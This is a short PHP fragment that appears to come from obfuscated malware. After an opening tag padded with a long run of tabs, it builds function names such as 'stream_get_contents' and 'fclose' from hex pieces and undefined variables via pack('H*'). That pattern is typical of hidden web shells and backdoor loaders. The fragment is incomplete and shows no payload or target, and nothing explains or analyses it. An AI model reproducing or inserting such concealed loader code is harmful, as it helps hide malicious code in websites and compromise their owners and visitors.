<?php																																										
 
$locked6 = pack("H*", $property1.$property11.$property9.$property4.'61'.'6d'.'5f'.$property12.$property4.'74'.$property3.$property5.$property13.$property14.'74'.'65'.$property14.$property11.'73');
$locked7 = pack("H*", $property7.$property5.'6c'.'6f'.'73'.'65');

